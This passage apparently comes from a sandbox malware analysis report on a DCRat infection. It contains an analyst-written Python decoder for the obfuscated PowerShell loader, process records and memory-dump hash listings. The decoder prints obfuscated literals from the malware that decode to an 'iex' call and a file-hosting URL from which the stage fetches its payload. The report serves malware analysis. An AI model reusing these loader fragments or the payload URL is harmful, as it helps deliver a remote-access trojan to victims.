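The command line above (identical for Target ID 3 and Target ID 6, the 64-bit and SysWOW64 PowerShell instances) hides every string behind Forfladigelsens, which walks the literal taking each sixth character from offset 5 and stops before the final character, then feeds the result to Inddatafiler223, whose body is `. ($Rull)` with $Rull decoding to iex. The decoder below is an added example for this report, not code from the sample or from Joe Sandbox; the four literals in OBFUSCATED are copied from the command line, while the helper names, the call-site regex and the stride-recovery heuristic are ours. One caveat for anyone copying strings out of this rendered report: runs of adjacent spaces have been collapsed in the HTML, so the literal assigned to $Gianthood (which should yield the Firefox/121.0 User-Agent seen in the wab.exe request above) no longer decodes cleanly from the copied text; the four used here contain no such boundary and do. Decode from the original las.cmd when exactness matters.

```python
"""Decoder for the string obfuscation used by this sample's PowerShell stage.

Added example for this report; not code from the sample or from Joe Sandbox.
Semantics copied from the stage's Forfladigelsens function:
    $Tsp = $s.Length - 1
    for ($i = 5; $i -lt $Tsp; $i += 6) { $out += $s.Substring($i, 1) }
i.e. every sixth character starting at offset 5, never the final character.
"""
from __future__ import annotations

import re


def decode_stride(s: str, offset: int = 5, stride: int = 6) -> str:
    """Port of Forfladigelsens: s[offset], s[offset+stride], ... while index < len(s) - 1."""
    return "".join(s[i] for i in range(offset, len(s) - 1, stride))


# Literals copied verbatim from the powershell.exe command line above (raw strings: the
# backslash in $Bondages is data).  Keyed by the variable each one is assigned to.
OBFUSCATED = {
    "$Rull": r"K emsiTvilleCampbxmodul ",
    "$Varmepudes": r" ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ",
    "$Radernes": r"SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ",
    "$Bondages": r"Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ",
}

# Call pattern used throughout the stage: Forfladigelsens '<literal>'.  Our regex, not the sample's.
FORFLADIGELSENS_CALL = re.compile(r"Forfladigelsens\s+'([^']*)'")


def decode_all() -> dict[str, str]:
    """Decode the copied literals, keyed by PowerShell variable name."""
    return {name: decode_stride(literal) for name, literal in OBFUSCATED.items()}


def decode_script(script_text: str) -> list[str]:
    """Decode every Forfladigelsens '...' call in a script body, in order of appearance."""
    return [decode_stride(m.group(1)) for m in FORFLADIGELSENS_CALL.finditer(script_text)]


def recover_parameters(sample: str, marker: str, max_stride: int = 12) -> tuple[int, int] | None:
    """For a variant whose (offset, stride) differ from (5, 6): brute-force both and return the
    first pair whose decode contains `marker` (e.g. 'http' for a URL literal).  Our heuristic."""
    for stride in range(2, max_stride + 1):
        for offset in range(stride):
            if marker in decode_stride(sample, offset, stride):
                return offset, stride
    return None


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:<12} {value}")
    # A one-line excerpt in the stage's own call style, to exercise decode_script():
    print(decode_script("Inddatafiler223 (Forfladigelsens 'K emsiTvilleCampbxmodul ');"))  # ['iex']
    print(recover_parameters(OBFUSCATED["$Radernes"], "http"))  # (5, 6)
```

Run as a script it prints the four plaintexts: $Rull is iex, $Varmepudes is the header name User-Agent, $Radernes is the sendspace URL the stage requests first (consistent with the 302 to fs03n3.sendspace.com whose tail is shown at the top of this section), and $Bondages is the `echo %appdata%\Preaffirmative.Spo && echo t` line that appears verbatim as Target ID 5 and 7, which the stage runs through cmd /c to learn the %appdata% path. decode_script() is the routine to point at the raw las.cmd once it has been extracted from the batch wrapper, and recover_parameters() is for the next build that changes the offset or stride but keeps the scheme.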

                                                                          Target ID:7
                                                                          Start time:15:00:34
Start date: 23/05/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 15:00:54
Start date: 23/05/2024
Path: C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\windows mail\wab.exe"
Imagebase: 0x20000
File size: 516'608 bytes
MD5 hash: 251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation: moderate
Has exited: false

                                                                            • Opcode ID: c9e4503b2b32ded4d81d8cad626083518bf7f717b98feee7f845e8bf9b785314
                                                                            • Instruction ID: 477ce010e2f6de12883430d9e77170802bb115a8b29374c6521ea9f4090cde66
                                                                            • Opcode Fuzzy Hash: c9e4503b2b32ded4d81d8cad626083518bf7f717b98feee7f845e8bf9b785314
                                                                            • Instruction Fuzzy Hash: CFC16EF4A002059FDB18CFA4CA90BAFB7B3AF84744F14C559D9166B794CB31AC46CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84}l$tP]q
                                                                            • API String ID: 0-341419813
                                                                            • Opcode ID: 2544c01a6459572bee75f7d5f28a23860259631ab39b3a974c9649d74b9db92f
                                                                            • Instruction ID: d0d912170ed59d03ea2a8310918db00b38a8a79ff0b21f1c079b8b5b1e098c2f
                                                                            • Opcode Fuzzy Hash: 2544c01a6459572bee75f7d5f28a23860259631ab39b3a974c9649d74b9db92f
                                                                            • Instruction Fuzzy Hash: 9751D4B060A3859FC7168B65C864A26BFB1AF46201F19C4EFD446CF3D3C6369C46C7A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q
                                                                            • API String ID: 0-127220927
                                                                            • Opcode ID: 11ab7ee8bed0bdaedbdbfead019523c8cf47a4cdc69600092f08644bcc8e92c0
                                                                            • Instruction ID: 1ad2830c0fa4c2f6217efdbe748189935889b6934c9ff9293f69203f03f9292c
                                                                            • Opcode Fuzzy Hash: 11ab7ee8bed0bdaedbdbfead019523c8cf47a4cdc69600092f08644bcc8e92c0
                                                                            • Instruction Fuzzy Hash: B31184B97193869FD71A8B24D840B62BF72AFC3214B29819BD8459F2D3E6728805C791
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q
                                                                            • API String ID: 0-1007455737
                                                                            • Opcode ID: efd259db1b0194086ca76fbb6d5a490abf415ebceaf50b84eaeb2a12866c8d13
                                                                            • Instruction ID: 4efd53cc8b509baaa4b582684daa928da5629679f44607d6556f50ffbd72b26d
                                                                            • Opcode Fuzzy Hash: efd259db1b0194086ca76fbb6d5a490abf415ebceaf50b84eaeb2a12866c8d13
                                                                            • Instruction Fuzzy Hash: 538136B27043469FD7194B38885076BBBA5EFC2210F1484ABD49ACB792CB35DC46C7E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q
                                                                            • API String ID: 0-1259897404
                                                                            • Opcode ID: 6f934d29cc4b71040c47af7c0eb507724ed688007085999367395fabc9b056f0
                                                                            • Instruction ID: 4f9b43c26aac2fcdabf467b51fe4ff2c14a9d1ded04237dc60bb38f4096d8140
                                                                            • Opcode Fuzzy Hash: 6f934d29cc4b71040c47af7c0eb507724ed688007085999367395fabc9b056f0
                                                                            • Instruction Fuzzy Hash: 31314DF1B182638FDB296A34454137B7BA19F81610F0508AAD552CF3D2EB27D946C7E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.pk
                                                                            • API String ID: 0-1212415395
                                                                            • Opcode ID: a4fb5188cc2c9d9a66cf50ce694dc2e2b0a0b9888e109fc8d041646b199c75ea
                                                                            • Instruction ID: 6f9683e606299429073f0b4f905fdd2067ccb649fbe9355943f302ce14856010
                                                                            • Opcode Fuzzy Hash: a4fb5188cc2c9d9a66cf50ce694dc2e2b0a0b9888e109fc8d041646b199c75ea
                                                                            • Instruction Fuzzy Hash: 5831B7B07402049FE704ABA4CA95FAE7AA7EFC4744F108424E9116F395CE76EC46CBE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 89fc843d2b21a484a5b9371c8f738eae829d635cd835ce92aa7f78da7caf2f52
                                                                            • Instruction ID: 62b0b1b40dfc5d8a32b26d2f5634d2ba022cb77be0f06502551db6684d6f510a
                                                                            • Opcode Fuzzy Hash: 89fc843d2b21a484a5b9371c8f738eae829d635cd835ce92aa7f78da7caf2f52
                                                                            • Instruction Fuzzy Hash: 23627FB4A00205CFDB14CBA8C695E5ABBB6EF84304F14C469D9169F396CB72EC46CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40d52e1c4bfbc710e884254de2c48f8e0c5389ac5e66a2023e61c31474e2e438
                                                                            • Instruction ID: 2e91859abe85d6bf2e764e0d1e032358ec393b2501e08016c876aa110de48fa2
                                                                            • Opcode Fuzzy Hash: 40d52e1c4bfbc710e884254de2c48f8e0c5389ac5e66a2023e61c31474e2e438
                                                                            • Instruction Fuzzy Hash: 21325DB4A00205DFDB14CBA8C695E5ABBB2EF84304F14C459D91AAF396C772EC46CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84b34dec13622639d9beee7f63144db2c8a1917ea4db356cb4a7d5dfa9e6c30b
                                                                            • Instruction ID: 296744763b209fcb624d7f65dc54f3cd7c01a1b47f59ed2a74b8c11f676ebbfc
                                                                            • Opcode Fuzzy Hash: 84b34dec13622639d9beee7f63144db2c8a1917ea4db356cb4a7d5dfa9e6c30b
                                                                            • Instruction Fuzzy Hash: 8E126EB4A00205DFDB14CB98C695E6ABBB2EF84304F14C459D91A6F396C772EC46CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9cab738de02db878780ced36ea7e0c71eaf08f40e8159263b9c07b37f0ca36e2
                                                                            • Instruction ID: cd3d34cbaa874607f346b8f52c1e135f8d71f2e6dbe31c4700dc143bc34b766a
                                                                            • Opcode Fuzzy Hash: 9cab738de02db878780ced36ea7e0c71eaf08f40e8159263b9c07b37f0ca36e2
                                                                            • Instruction Fuzzy Hash: C58171B8A00215DFDB18DF64C594A9ABBF2EF88314F15C959D9056B391C733EC42CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ff760e8dcf056d6ac3f5667faa35f3a9d303fc861f675d102a136369b625788c
                                                                            • Instruction ID: 0ee4c753fa2b6b01c49a3b724f250bf694eaa8e10541c783944f4039383177dd
                                                                            • Opcode Fuzzy Hash: ff760e8dcf056d6ac3f5667faa35f3a9d303fc861f675d102a136369b625788c
                                                                            • Instruction Fuzzy Hash: 24815EB8A00215DFDB18DF64C594A9AB7B2EF88314F15C859D9066B391C733EC42CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e568c127663e55393edf3f33836077df34c421ef5c95ab2329253753667afb0a
                                                                            • Instruction ID: 21ef81f7624df926f0da2fe30e8334422892196b38718843109738b2ba0423ce
                                                                            • Opcode Fuzzy Hash: e568c127663e55393edf3f33836077df34c421ef5c95ab2329253753667afb0a
                                                                            • Instruction Fuzzy Hash: 4121B0B4640215CFDB148FA0C940BEE7B72EF42304F1085A5D90A6B391CB769E82CFD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a95ec5bfb6eb63cac5690e313bb0bf95ed33400a74342e2e73249e61cf6b05bd
                                                                            • Instruction ID: 4b6631737d248287df4089e67717115d3666674ed264d16a99b6cdc5bd6b3e7b
                                                                            • Opcode Fuzzy Hash: a95ec5bfb6eb63cac5690e313bb0bf95ed33400a74342e2e73249e61cf6b05bd
                                                                            • Instruction Fuzzy Hash: F611C0B4640215DFD7148BA0CA81BEEB776EF41308F1080A5D90A6B781CB76AA86CFC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$ul$ul$ul$ul
                                                                            • API String ID: 0-3887445572
                                                                            • Opcode ID: 284ad3126c329fba44eb62ad375418d34aadbfbb2f8936bb80bc90d51897bef8
                                                                            • Instruction ID: 77d911fafd77449fe35de64cec54f582605a00a2facbc77ecddf7a9b8284a182
                                                                            • Opcode Fuzzy Hash: 284ad3126c329fba44eb62ad375418d34aadbfbb2f8936bb80bc90d51897bef8
                                                                            • Instruction Fuzzy Hash: F8F159B27042069FCB388A7895516EBBBE6EFC5310F14846AD816CB391DB31DD46CBE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Tok$4']q$4']q$4']q$4']q$4']q$4']q$DUok$$]q$$]q$$]q
                                                                            • API String ID: 0-1964947218
                                                                            • Opcode ID: ea0be65a7559ff4582616ae8e7b47166daf3ed527f501b9cd0aef420e9b3a26b
                                                                            • Instruction ID: e067b6495cd0f8c3deadf3a905a2e8f65c5281b5075bdae4663fec831ce84f89
                                                                            • Opcode Fuzzy Hash: ea0be65a7559ff4582616ae8e7b47166daf3ed527f501b9cd0aef420e9b3a26b
                                                                            • Instruction Fuzzy Hash: B2E103B1B042058FCB1C9F78D5446ABBBA6AF86310F14C5AAD8178B3D5DB31D846CBE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-2309685269
                                                                            • Opcode ID: 24e3ab8a093a3ec06290da76d1f75ecbcefccc3b505a10ddc1c7864eb2e8f399
                                                                            • Instruction ID: da2c8a31d69b23ea9be1985752756adff588980b334e442e36e8257f117843f6
                                                                            • Opcode Fuzzy Hash: 24e3ab8a093a3ec06290da76d1f75ecbcefccc3b505a10ddc1c7864eb2e8f399
                                                                            • Instruction Fuzzy Hash: A5A135B1B002099FCB2C8A79C54066FBBE7EF86710F14846AD8569B385DB35DD42CBE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-267665775
                                                                            • Opcode ID: e13c29fc9717c570a8bec6b3b799ff937831767932cf71669b8c8ab909277095
                                                                            • Instruction ID: 1ee00676d27452a2219383d41f88d7a66322aeda846c1fced2cc6c33ae8c057d
                                                                            • Opcode Fuzzy Hash: e13c29fc9717c570a8bec6b3b799ff937831767932cf71669b8c8ab909277095
                                                                            • Instruction Fuzzy Hash: 97A147B17143069FCB2D4A78D9A866B7BE5BF81610F1484BAD946CB3D1DB31C886C3E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84}l$84}l$84}l$84}l$tP]q$tP]q$tP]q$tP]q
                                                                            • API String ID: 0-819032969
                                                                            • Opcode ID: 791ff27e0cd93835b7c385d1130361b34c1abe762e537fd85143032bd8190f95
                                                                            • Instruction ID: c8094db0cea8ee96e431cc8da77d1645cd0662070f34030f101018d7e271c9b1
                                                                            • Opcode Fuzzy Hash: 791ff27e0cd93835b7c385d1130361b34c1abe762e537fd85143032bd8190f95
                                                                            • Instruction Fuzzy Hash: 7CA109707402259FD719AF68C944A6BBBF2EF89310F198869D9165B3D0DB32EC41CBE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.pk$-pk
                                                                            • API String ID: 0-3967578428
                                                                            • Opcode ID: c70f135083332509e0b7394672400ada425e987cf605363a10f396437120463c
                                                                            • Instruction ID: e0688c6590fdd31d793721b210c99e0508c1a9d19127fe3c3935f6a681d755d5
                                                                            • Opcode Fuzzy Hash: c70f135083332509e0b7394672400ada425e987cf605363a10f396437120463c
                                                                            • Instruction Fuzzy Hash: 2FD11CB4A04218CFDB68DF24C994BEAB7B6EF84304F1085D5D5096B395CB31AE86CF91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$84}l$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                                                            • API String ID: 0-3678008071
                                                                            • Opcode ID: 6f9ce6989ff6820e29241410621ff182f5d331b28687cb4f1fbfd04b98510edb
                                                                            • Instruction ID: 3dbdc8ba3235fcb2e63f5333218e1da341f8081aa29cf7a0ef9952cfde2fa279
                                                                            • Opcode Fuzzy Hash: 6f9ce6989ff6820e29241410621ff182f5d331b28687cb4f1fbfd04b98510edb
                                                                            • Instruction Fuzzy Hash: 3351B9F0600306DBCB2C8E25C544AA7B3A3BB45321F188866E8579B3D2C731EC81CBE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-1480752206
                                                                            • Opcode ID: 5479e5571fd5c9b0a8fcdca1efeacd00f11484fb825556488df2c68edb19affb
                                                                            • Instruction ID: 959f3c268f0bdb169172b5e9efc3e37f5bcc92c30958df787b91f1636749bfd2
                                                                            • Opcode Fuzzy Hash: 5479e5571fd5c9b0a8fcdca1efeacd00f11484fb825556488df2c68edb19affb
                                                                            • Instruction Fuzzy Hash: 1B61F3B170420BDFCB2CCE39D44066BBBA5AF81220F14C46AD8468BB91DB35DC52CBE0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$84}l$tP]q$$]q$$]q$$]q
                                                                            • API String ID: 0-498122519
                                                                            • Opcode ID: 094ad7426b248f7b96db00ce5d30a948304bdffd705aac6eecc1f83f30379f7a
                                                                            • Instruction ID: 0c6ade1732060223c6473496596f7f37c1260a9554d375afbfcb2007e752b4db
                                                                            • Opcode Fuzzy Hash: 094ad7426b248f7b96db00ce5d30a948304bdffd705aac6eecc1f83f30379f7a
                                                                            • Instruction Fuzzy Hash: 9E619DF4610306DBDB2C8EA4C544BBB77A2AB45391F18C065E802AB2D0CB35DD85CBE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$x.pk$-pk
                                                                            • API String ID: 0-86929144
                                                                            • Opcode ID: 3c0f463f0d88226662e6c2d4670f40fb1019edaad8aa37bcc03469db65e001e8
                                                                            • Instruction ID: bc315e6cefcc25cda973a5bb281442f96adcc226b8351bf4fe6944ff25e9a66b
                                                                            • Opcode Fuzzy Hash: 3c0f463f0d88226662e6c2d4670f40fb1019edaad8aa37bcc03469db65e001e8
                                                                            • Instruction Fuzzy Hash: 1AA16EB4A00218CFDB58DF24C990BEEB7B6EB45304F1085D5D5096B785CB31AE82CFA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4|l$4|l$tLqk
                                                                            • API String ID: 0-1044231163
                                                                            • Opcode ID: f7bb249e50446d619ecc3a4ab08eedc411f70c91338b01b535a4a3024eef7c54
                                                                            • Instruction ID: 25ed24d2522b8dc7c150a40e848f63d37528ba63a04a3ae0d9c264e54d90b658
                                                                            • Opcode Fuzzy Hash: f7bb249e50446d619ecc3a4ab08eedc411f70c91338b01b535a4a3024eef7c54
                                                                            • Instruction Fuzzy Hash: 5761D7B4B102059FD718DFA8C590A6BBBE7EF84314F148569D816AB394CB31EC46CBD2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                            • API String ID: 0-2702571027
                                                                            • Opcode ID: 3fc2a8e0655de70d15360077610816abb5518bdce224acfaf9551283cedbb6ef
                                                                            • Instruction ID: 5a3d2fd4103b9d6e4c589d2be55de3b96e50a9ceb82fab894965cfcb18bc9bdf
                                                                            • Opcode Fuzzy Hash: 3fc2a8e0655de70d15360077610816abb5518bdce224acfaf9551283cedbb6ef
                                                                            • Instruction Fuzzy Hash: AE41E2B0A042099FDB2D8E65C5807AF7BB2AF47710F1881A6D8569B6D1D731CD42CBD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tP]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-444294576
                                                                            • Opcode ID: 1f0f7f582c1b7a7b30bc1e9e2d957b8129ee142fcc57cfce891c82697ee03ba8
                                                                            • Instruction ID: d7bee5bedb670b6e9794f14ccdef52364ec99a48bbbdf2637c546eaed2a9c0d2
                                                                            • Opcode Fuzzy Hash: 1f0f7f582c1b7a7b30bc1e9e2d957b8129ee142fcc57cfce891c82697ee03ba8
                                                                            • Instruction Fuzzy Hash: DA21B2B6600226DFDB2CAE79C58096BBBF4EF40A10F154C66D9029B391C732ED04C7A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$ul$ul
                                                                            • API String ID: 0-2757999759
                                                                            • Opcode ID: b111581b55a9a0d0b7b82b4bf5b9897bb30c518958962f578e86f0264b6e1e1e
                                                                            • Instruction ID: f64012c21656019d7a30aa041bfe86f5b4963afbf37e40f475ae321e683f263c
                                                                            • Opcode Fuzzy Hash: b111581b55a9a0d0b7b82b4bf5b9897bb30c518958962f578e86f0264b6e1e1e
                                                                            • Instruction Fuzzy Hash: 571129753043069BDB2D49BE9800B27B7AABBC1761F2484AAE84A873D1E975C445C3D0
                                                                            Strings
                                                                            Memory Dump Source
